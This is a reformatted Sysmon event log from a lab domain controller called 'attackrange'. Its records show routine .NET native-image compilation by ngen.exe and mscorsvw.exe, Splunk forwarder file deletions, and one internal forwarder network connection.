Fields common to every record below (the export above runs them together without tags): Channel Microsoft-Windows-Sysmon/Operational, Computer win-dc-663.attackrange.local, Level 4, Opcode 0, Keywords 0x8000000000000000, Task equal to the EventID. Event versions: 23 FileDelete v5, 11 FileCreate v2, 10 ProcessAccess v3, 3 NetworkConnect v5. RuleName is "-" except on Event 11, where it is "DLL". All UtcTime values are on 2021-06-23. Every Hashes field ends with IMPHASH=00000000000000000000000000000000. Records are listed in the order they appear in the export, which is not record-ID order.

Recurring CallTrace values in the Event 10 records:
  CT-A (svchost.exe via rpcss): C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
  CT-B (csrss.exe via basesrv): C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
  CT-C (ngen.exe thread 5292 via mscorsvc): C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
  CT-D (ngen.exe thread 4348 via mscorsvc and ngen.exe): C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

EventRecordID 19136  Event 23 FileDelete  UtcTime 21:01:41.478
  ProcessGuid {4DB9351A-9DFF-60D3-7600-00000000CF01}  ProcessId 3068  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes MD5=1E186070E8391CB5F13932ED4C2228C4,SHA256=CF02946BDD9680E7B7404376E70073CC4EEC766D1C344CAE999EB917FB78B10F  IsExecutable false  Archived true

EventRecordID 19135  Event 23 FileDelete  UtcTime 21:01:41.462
  ProcessGuid {4DB9351A-A132-60D3-A702-00000000CF01}  ProcessId 6456  User NT AUTHORITY\SYSTEM
  Image C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  TargetFilename C:\Windows\assembly\temp\5JP8MHJSOD\System.Web.DataVisualization.ni.dll.aux
  Hashes MD5=DE2622A49A0D9055B93FD3BAF139D158,SHA256=AFCFB35EA94AC24E7AE8F1353CBC45E2501B51F2D32A8EFB5876A9D6AB82C9B2  IsExecutable false  Archived true

EventRecordID 19134  Event 23 FileDelete  UtcTime 21:01:41.462
  ProcessGuid {4DB9351A-A132-60D3-A702-00000000CF01}  ProcessId 6456  User NT AUTHORITY\SYSTEM
  Image C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  TargetFilename C:\Windows\assembly\temp\5JP8MHJSOD\System.Web.DataVisualization.ni.dll
  Hashes MD5=FF1228BCF16D430D1112FAB270410537,SHA256=DA4850A9B5EAD8C28365CE1FACF4D74FBA5A403C59565C1ED835F978BD6818BF  IsExecutable true  Archived true

EventRecordID 19133  Event 11 FileCreate (RuleName DLL)  UtcTime 21:01:41.386
  ProcessGuid {4DB9351A-A132-60D3-A702-00000000CF01}  ProcessId 6456
  Image C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  TargetFilename C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1938-0\System.Web.DataVisualization.dll
  CreationUtcTime 2021-06-23 21:01:41.368

EventRecordID 19154  Event 23 FileDelete  UtcTime 21:01:42.728
  ProcessGuid {4DB9351A-9DFF-60D3-7600-00000000CF01}  ProcessId 3068  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security
  Hashes MD5=7625E9E47EA07A5B0CA004BCAE284B8F,SHA256=E44148852265361BA7A3100DFF5338EC7485EF4C0E8E8559D4BC9A13A82CD2FF  IsExecutable false  Archived true

EventRecordID 19153  Event 23 FileDelete  UtcTime 21:01:42.525
  ProcessGuid {4DB9351A-9DFF-60D3-7600-00000000CF01}  ProcessId 3068  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes MD5=D51A2A702F63BA4C7EBA42D0DA02B74B,SHA256=07B440D3E132CBED0E15FC59A9963205EC7351D39610494B94987BC0C4865C5C  IsExecutable false  Archived true

EventRecordID 19152  Event 10 ProcessAccess  UtcTime 21:01:42.306
  Source {4DB9351A-9DDD-60D3-0C00-00000000CF01}  ProcessId 844  ThreadId 368  C:\Windows\system32\svchost.exe
  Target {4DB9351A-A136-60D3-AB02-00000000CF01}  ProcessId 5300  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x1000  CallTrace CT-A

EventRecordID 19151  Event 10 ProcessAccess  UtcTime 21:01:42.290
  Source {4DB9351A-9DDB-60D3-0500-00000000CF01}  ProcessId 412  ThreadId 528  C:\Windows\system32\csrss.exe
  Target {4DB9351A-A136-60D3-AB02-00000000CF01}  ProcessId 5300  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x1fffff  CallTrace CT-B

EventRecordID 19150  Event 10 ProcessAccess  UtcTime 21:01:42.275
  Source {4DB9351A-A036-60D3-1601-00000000CF01}  ProcessId 680  ThreadId 5292  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
  Target {4DB9351A-A136-60D3-AB02-00000000CF01}  ProcessId 5300  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x103801  CallTrace CT-C

EventRecordID 19149  Event 10 ProcessAccess  UtcTime 21:01:42.040
  Source {4DB9351A-9DDD-60D3-0C00-00000000CF01}  ProcessId 844  ThreadId 368  C:\Windows\system32\svchost.exe
  Target {4DB9351A-A136-60D3-AA02-00000000CF01}  ProcessId 6116  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x1000  CallTrace CT-A

EventRecordID 19148  Event 10 ProcessAccess  UtcTime 21:01:42.025
  Source {4DB9351A-9DDB-60D3-0500-00000000CF01}  ProcessId 412  ThreadId 528  C:\Windows\system32\csrss.exe
  Target {4DB9351A-A136-60D3-AA02-00000000CF01}  ProcessId 6116  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x1fffff  CallTrace CT-B

EventRecordID 19147  Event 10 ProcessAccess  UtcTime 21:01:42.025
  Source {4DB9351A-A036-60D3-1601-00000000CF01}  ProcessId 680  ThreadId 4348  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
  Target {4DB9351A-A136-60D3-AA02-00000000CF01}  ProcessId 6116  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x103801  CallTrace CT-D

EventRecordID 19155  Event 23 FileDelete  UtcTime 21:01:43.665
  ProcessGuid {4DB9351A-9DFF-60D3-7600-00000000CF01}  ProcessId 3068  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes MD5=04970A851FC54FEF2AFFDAAA90F2BD5C,SHA256=0B830481E5740403BC5ADDC8F365CE55004748D5BBBB59FCF9590380C32DA8EB  IsExecutable false  Archived true

EventRecordID 19171  Event 10 ProcessAccess  UtcTime 21:01:44.978
  Source {4DB9351A-9DDD-60D3-0C00-00000000CF01}  ProcessId 844  ThreadId 368  C:\Windows\system32\svchost.exe
  Target {4DB9351A-A138-60D3-AE02-00000000CF01}  ProcessId 6772  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x1000  CallTrace CT-A

EventRecordID 19170  Event 10 ProcessAccess  UtcTime 21:01:44.962
  Source {4DB9351A-9DDB-60D3-0500-00000000CF01}  ProcessId 412  ThreadId 528  C:\Windows\system32\csrss.exe
  Target {4DB9351A-A138-60D3-AE02-00000000CF01}  ProcessId 6772  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x1fffff  CallTrace CT-B

EventRecordID 19169  Event 10 ProcessAccess  UtcTime 21:01:44.962
  Source {4DB9351A-A036-60D3-1601-00000000CF01}  ProcessId 680  ThreadId 5292  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
  Target {4DB9351A-A138-60D3-AE02-00000000CF01}  ProcessId 6772  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x103801  CallTrace CT-C

EventRecordID 19168  Event 10 ProcessAccess  UtcTime 21:01:44.900
  Source {4DB9351A-9DDD-60D3-0C00-00000000CF01}  ProcessId 844  ThreadId 368  C:\Windows\system32\svchost.exe
  Target {4DB9351A-A138-60D3-AD02-00000000CF01}  ProcessId 2160  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x1000  CallTrace CT-A

EventRecordID 19167  Event 10 ProcessAccess  UtcTime 21:01:44.884
  Source {4DB9351A-9DDB-60D3-0500-00000000CF01}  ProcessId 412  ThreadId 432  C:\Windows\system32\csrss.exe
  Target {4DB9351A-A138-60D3-AD02-00000000CF01}  ProcessId 2160  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x1fffff  CallTrace CT-B

EventRecordID 19166  Event 10 ProcessAccess  UtcTime 21:01:44.884
  Source {4DB9351A-A036-60D3-1601-00000000CF01}  ProcessId 680  ThreadId 4348  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
  Target {4DB9351A-A138-60D3-AD02-00000000CF01}  ProcessId 2160  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x103801  CallTrace CT-D

EventRecordID 19165  Event 23 FileDelete  UtcTime 21:01:44.822
  ProcessGuid {4DB9351A-A138-60D3-AC02-00000000CF01}  ProcessId 3836  User NT AUTHORITY\SYSTEM
  Image C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  TargetFilename C:\Windows\assembly\temp\N9MRKRGZ6I\System.Web.DynamicData.ni.dll.aux
  Hashes MD5=C22E91F150EDB4CD008D2BA33EF58E2E,SHA256=85F4BA0A6ABE1F9B527BB2BBDEC915FE6BDDD5C90E267B0C8A60A1F52A16AE25  IsExecutable false  Archived true

EventRecordID 19164  Event 23 FileDelete  UtcTime 21:01:44.822
  ProcessGuid {4DB9351A-A138-60D3-AC02-00000000CF01}  ProcessId 3836  User NT AUTHORITY\SYSTEM
  Image C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  TargetFilename C:\Windows\assembly\temp\N9MRKRGZ6I\System.Web.DynamicData.ni.dll
  Hashes MD5=B78912A307E7BBA4F29DA437414DAF8A,SHA256=DF916CC92732377CD362D6C43ABD78C29B666A59FE4A76A0E5F4F0C7388C53BB  IsExecutable true  Archived true

EventRecordID 19163  Event 11 FileCreate (RuleName DLL)  UtcTime 21:01:44.806
  ProcessGuid {4DB9351A-A138-60D3-AC02-00000000CF01}  ProcessId 3836
  Image C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  TargetFilename C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\efc-0\System.Web.DynamicData.dll
  CreationUtcTime 2021-06-23 21:01:44.806

EventRecordID 19162  Event 23 FileDelete  UtcTime 21:01:44.728
  ProcessGuid {4DB9351A-9DFF-60D3-7600-00000000CF01}  ProcessId 3068  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes MD5=0B6A662AAD1230828361BC218B87C3FF,SHA256=436E936045A90D2241BA5B8F7CA71C1F8443E8AF5E002D475EC5F1470E6FF528  IsExecutable false  Archived true

EventRecordID 19161  Event 10 ProcessAccess  UtcTime 21:01:44.259
  Source {4DB9351A-9DDD-60D3-0C00-00000000CF01}  ProcessId 844  ThreadId 368  C:\Windows\system32\svchost.exe
  Target {4DB9351A-A138-60D3-AC02-00000000CF01}  ProcessId 3836  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x1000  CallTrace CT-A

EventRecordID 19160  Event 10 ProcessAccess  UtcTime 21:01:44.243
  Source {4DB9351A-9DDB-60D3-0500-00000000CF01}  ProcessId 412  ThreadId 496  C:\Windows\system32\csrss.exe
  Target {4DB9351A-A138-60D3-AC02-00000000CF01}  ProcessId 3836  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x1fffff  CallTrace CT-B

EventRecordID 19159  Event 10 ProcessAccess  UtcTime 21:01:44.243
  Source {4DB9351A-A036-60D3-1601-00000000CF01}  ProcessId 680  ThreadId 5292  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
  Target {4DB9351A-A138-60D3-AC02-00000000CF01}  ProcessId 3836  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x103801  CallTrace CT-C

EventRecordID 19158  Event 23 FileDelete  UtcTime 21:01:44.118
  ProcessGuid {4DB9351A-A136-60D3-AB02-00000000CF01}  ProcessId 5300  User NT AUTHORITY\SYSTEM
  Image C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  TargetFilename C:\Windows\assembly\temp\G3H222JM0B\System.Web.Extensions.ni.dll.aux
  Hashes MD5=E8F4C36A4E6B40383EDA377A04AC3D80,SHA256=D26DEAE3EFF297F307D1DFEA752DA8C1138764F05CFF3BF2C4D1D6C483227224  IsExecutable false  Archived true

EventRecordID 19157  Event 23 FileDelete  UtcTime 21:01:44.118
  ProcessGuid {4DB9351A-A136-60D3-AB02-00000000CF01}  ProcessId 5300  User NT AUTHORITY\SYSTEM
  Image C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  TargetFilename C:\Windows\assembly\temp\G3H222JM0B\System.Web.Extensions.ni.dll
  Hashes MD5=82A7D13D9CDAECC5A12DAF807265050F,SHA256=7C2B3A8CF0A620E68934FC9E1DEE80B5309B281D686BDC02E85A8C2653BE4CCE  IsExecutable true  Archived true

EventRecordID 19156  Event 11 FileCreate (RuleName DLL)  UtcTime 21:01:44.056
  ProcessGuid {4DB9351A-A136-60D3-AB02-00000000CF01}  ProcessId 5300
  Image C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  TargetFilename C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\14b4-0\System.Web.Extensions.dll
  CreationUtcTime 2021-06-23 21:01:44.056

EventRecordID 19192  Event 11 FileCreate (RuleName DLL)  UtcTime 21:01:45.978
  ProcessGuid {4DB9351A-A139-60D3-B202-00000000CF01}  ProcessId 4152
  Image C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  TargetFilename C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1038-0\System.Web.Entity.Design.dll
  CreationUtcTime 2021-06-23 21:01:45.978

EventRecordID 19191  Event 23 FileDelete  UtcTime 21:01:45.900
  ProcessGuid {4DB9351A-9DFF-60D3-7600-00000000CF01}  ProcessId 3068  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes MD5=E32CAE9B52967ABED30B97FB590A2759,SHA256=AD8FAAAB71131B3AF5F5FF0483DA1133ED8870320B7EC9F51162E9E3A25457DF  IsExecutable false  Archived true

EventRecordID 19190  Event 10 ProcessAccess  UtcTime 21:01:45.681
  Source {4DB9351A-9DDD-60D3-0C00-00000000CF01}  ProcessId 844  ThreadId 368  C:\Windows\system32\svchost.exe
  Target {4DB9351A-A139-60D3-B202-00000000CF01}  ProcessId 4152  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x1000  CallTrace CT-A

EventRecordID 19189  Event 10 ProcessAccess  UtcTime 21:01:45.665
  Source {4DB9351A-9DDB-60D3-0500-00000000CF01}  ProcessId 412  ThreadId 496  C:\Windows\system32\csrss.exe
  Target {4DB9351A-A139-60D3-B202-00000000CF01}  ProcessId 4152  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x1fffff  CallTrace CT-B

EventRecordID 19188  Event 10 ProcessAccess  UtcTime 21:01:45.665
  Source {4DB9351A-A036-60D3-1601-00000000CF01}  ProcessId 680  ThreadId 5292  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
  Target {4DB9351A-A139-60D3-B202-00000000CF01}  ProcessId 4152  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x103801  CallTrace CT-C

EventRecordID 19187  Event 10 ProcessAccess  UtcTime 21:01:45.572
  Source {4DB9351A-9DDD-60D3-0C00-00000000CF01}  ProcessId 844  ThreadId 368  C:\Windows\system32\svchost.exe
  Target {4DB9351A-A139-60D3-B102-00000000CF01}  ProcessId 3332  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x1000  CallTrace CT-A

EventRecordID 19186  Event 10 ProcessAccess  UtcTime 21:01:45.556
  Source {4DB9351A-9DDB-60D3-0500-00000000CF01}  ProcessId 412  ThreadId 432  C:\Windows\system32\csrss.exe
  Target {4DB9351A-A139-60D3-B102-00000000CF01}  ProcessId 3332  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x1fffff  CallTrace CT-B

EventRecordID 19185  Event 10 ProcessAccess  UtcTime 21:01:45.556
  Source {4DB9351A-A036-60D3-1601-00000000CF01}  ProcessId 680  ThreadId 4348  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
  Target {4DB9351A-A139-60D3-B102-00000000CF01}  ProcessId 3332  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x103801  CallTrace CT-D

EventRecordID 19184  Event 23 FileDelete  UtcTime 21:01:45.509
  ProcessGuid {4DB9351A-A139-60D3-B002-00000000CF01}  ProcessId 1176  User NT AUTHORITY\SYSTEM
  Image C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  TargetFilename C:\Windows\assembly\temp\TWOG0IDEFR\System.Web.Entity.ni.dll.aux
  Hashes MD5=BE26495AB227F594D84D68CBF2C3996E,SHA256=4016A70C60F130994F91566D1054BD5848CBB0A2DB2870417479C85EC78BF26D  IsExecutable false  Archived true

EventRecordID 19183  Event 23 FileDelete  UtcTime 21:01:45.509
  ProcessGuid {4DB9351A-A139-60D3-B002-00000000CF01}  ProcessId 1176  User NT AUTHORITY\SYSTEM
  Image C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  TargetFilename C:\Windows\assembly\temp\TWOG0IDEFR\System.Web.Entity.ni.dll
  Hashes MD5=3B0956C6DB4C8B4C84FB1ACEC6F041F3,SHA256=B8D128580B589C369B21125268220ACEDBAC552DE5411CF313F6B63D83CD3E3F  IsExecutable true  Archived true

EventRecordID 19182  Event 11 FileCreate (RuleName DLL)  UtcTime 21:01:45.493
  ProcessGuid {4DB9351A-A139-60D3-B002-00000000CF01}  ProcessId 1176
  Image C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  TargetFilename C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\498-0\System.Web.Entity.dll
  CreationUtcTime 2021-06-23 21:01:45.493

EventRecordID 19181  Event 23 FileDelete  UtcTime 21:01:45.243
  ProcessGuid {4DB9351A-9DFF-60D3-7600-00000000CF01}  ProcessId 3068  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security
  Hashes MD5=E35AA0765AAF2A62DE4E6926DCCB348D,SHA256=4C363BA10FC44F487F10C2F0B79F58D7EF7D3C5241DD48EF70F262D53B314EF6  IsExecutable false  Archived true

EventRecordID 19180  Event 10 ProcessAccess  UtcTime 21:01:45.243
  Source {4DB9351A-9DDD-60D3-0C00-00000000CF01}  ProcessId 844  ThreadId 368  C:\Windows\system32\svchost.exe
  Target {4DB9351A-A139-60D3-B002-00000000CF01}  ProcessId 1176  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x1000  CallTrace CT-A

EventRecordID 19179  Event 10 ProcessAccess  UtcTime 21:01:45.228
  Source {4DB9351A-9DDB-60D3-0500-00000000CF01}  ProcessId 412  ThreadId 496  C:\Windows\system32\csrss.exe
  Target {4DB9351A-A139-60D3-B002-00000000CF01}  ProcessId 1176  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x1fffff  CallTrace CT-B

EventRecordID 19178  Event 10 ProcessAccess  UtcTime 21:01:45.228
  Source {4DB9351A-A036-60D3-1601-00000000CF01}  ProcessId 680  ThreadId 5292  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
  Target {4DB9351A-A139-60D3-B002-00000000CF01}  ProcessId 1176  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x103801  CallTrace CT-C

EventRecordID 19177  Event 10 ProcessAccess  UtcTime 21:01:45.165
  Source {4DB9351A-9DDD-60D3-0C00-00000000CF01}  ProcessId 844  ThreadId 368  C:\Windows\system32\svchost.exe
  Target {4DB9351A-A139-60D3-AF02-00000000CF01}  ProcessId 6696  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x1000  CallTrace CT-A

EventRecordID 19176  Event 10 ProcessAccess  UtcTime 21:01:45.150
  Source {4DB9351A-9DDB-60D3-0500-00000000CF01}  ProcessId 412  ThreadId 528  C:\Windows\system32\csrss.exe
  Target {4DB9351A-A139-60D3-AF02-00000000CF01}  ProcessId 6696  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x1fffff  CallTrace CT-B

EventRecordID 19175  Event 10 ProcessAccess  UtcTime 21:01:45.150
  Source {4DB9351A-A036-60D3-1601-00000000CF01}  ProcessId 680  ThreadId 4348  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
  Target {4DB9351A-A139-60D3-AF02-00000000CF01}  ProcessId 6696  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x103801  CallTrace CT-D

EventRecordID 19174  Event 23 FileDelete  UtcTime 21:01:45.072
  ProcessGuid {4DB9351A-A138-60D3-AE02-00000000CF01}  ProcessId 6772  User NT AUTHORITY\SYSTEM
  Image C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  TargetFilename C:\Windows\assembly\temp\VBCPC7HHRJ\System.Web.DynamicData.Design.ni.dll.aux
  Hashes MD5=7411A37BE63B5304E6165D1602AC946D,SHA256=29C5CCE66171CD6180E387917A39CDBBA51C8949ABB58962D882BBEF2443E290  IsExecutable false  Archived true

EventRecordID 19173  Event 23 FileDelete  UtcTime 21:01:45.056
  ProcessGuid {4DB9351A-A138-60D3-AE02-00000000CF01}  ProcessId 6772  User NT AUTHORITY\SYSTEM
  Image C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  TargetFilename C:\Windows\assembly\temp\VBCPC7HHRJ\System.Web.DynamicData.Design.ni.dll
  Hashes MD5=DA77F7BC5C7BA3BA3DDBC63CA462B62D,SHA256=0465F7A0D59262458766B192A1E78632304161F2BE1738B512E205992FBFFB49  IsExecutable true  Archived true

EventRecordID 19172  Event 11 FileCreate (RuleName DLL)  UtcTime 21:01:45.049
  ProcessGuid {4DB9351A-A138-60D3-AE02-00000000CF01}  ProcessId 6772
  Image C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  TargetFilename C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1a74-0\System.Web.DynamicData.Design.dll
  CreationUtcTime 2021-06-23 21:01:45.049

EventRecordID 19209  Event 23 FileDelete  UtcTime 21:01:46.962
  ProcessGuid {4DB9351A-9DFF-60D3-7600-00000000CF01}  ProcessId 3068  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes MD5=050B23643C4DF58FE2EDE5C7C8F0DF23,SHA256=7F0D42BED428F8CAA87F0B528750EB3C38A7440D0762E31C52822CF29D849D16  IsExecutable false  Archived true

EventRecordID 19208  Event 3 NetworkConnect  UtcTime 21:01:45.203
  ProcessGuid {4DB9351A-9DF7-60D3-6D00-00000000CF01}  ProcessId 3888  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe
  Protocol tcp  Initiated true  SourceIsIpv6 false  SourceIp 10.0.1.14  SourceHostname win-dc-663.attackrange.local  SourcePort 61375  SourcePortName -
  DestinationIsIpv6 false  DestinationIp 10.0.1.12  DestinationHostname -  DestinationPort 8000  DestinationPortName -

EventRecordID 19207  Event 23 FileDelete  UtcTime 21:01:46.947
  ProcessGuid {4DB9351A-A13A-60D3-B502-00000000CF01}  ProcessId 6592  User NT AUTHORITY\SYSTEM
  Image C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  TargetFilename C:\Windows\assembly\temp\EN8D4AZ5KR\System.Web.Extensions.Design.ni.dll.aux
  Hashes MD5=5C6EBD515D79DA98F180A67AD4F7C671,SHA256=5498841C007742257510FC1E67CC64F6DE5CB4099E96F36DA3262878E5508397  IsExecutable false  Archived true

